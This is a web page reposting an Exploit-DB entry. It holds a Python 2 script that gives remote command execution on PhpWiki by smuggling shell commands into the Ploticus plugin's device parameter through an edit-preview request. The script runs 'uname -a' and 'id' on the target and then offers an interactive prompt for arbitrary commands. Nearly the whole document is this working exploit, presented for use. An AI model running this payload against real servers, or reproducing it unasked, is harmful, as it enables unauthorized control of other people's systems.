PhpWiki – Remote Command Execution - 体验盒子

作者： Benjamin Harris

日期： 2014-08-28

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/34451/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

###############################################################

#_______ __ _

# / __/_______ _____/ /_____ ___(_) /__(_)

#/ /_/ / / / __ <code>/ / __ \/ __ \/ __ \ | /| / / / //_/ /

# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /

#/_/\__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/

# /_/ /_/ /_/

# Diskovered in Nov/Dec 2011

###############################################################

import urllib

import urllib2

import sys

def banner():

print " _______ __ _ "

print " / __/_______ _____/ /_____ ___(_) /__(_)"

print " / /_/ / / / __ </code>/ / __ \/ __ \/ __ \ | /| / / / //_/ / "

print " / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /"

print " /_/\__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/ "

print " /_/ /_/ /_/ \n"

def usage():

banner()

print " [+] Usage example"

print " [-] python " + sys.argv[0] + " http://path.to/wiki"

if len(sys.argv)< 2:

usage()

quit()

domain = sys.argv[1]

def commandexec(cmd):

data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])

cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)

cmd2 = urllib2.urlopen(cmd1)

output = cmd2.read()

firstloc = output.find("123:::\n") + len("123:::\n")

secondloc = output.find("\n:::123")

return output[firstloc:secondloc]

banner()

print commandexec('uname -a')

print commandexec('id')

while(quit != 1):

cmd = raw_input('Run a command: ')

if cmd == 'quit':

print "[-] Hope you had fun :)"

quit = 1

if cmd != 'quit':

print commandexec(cmd)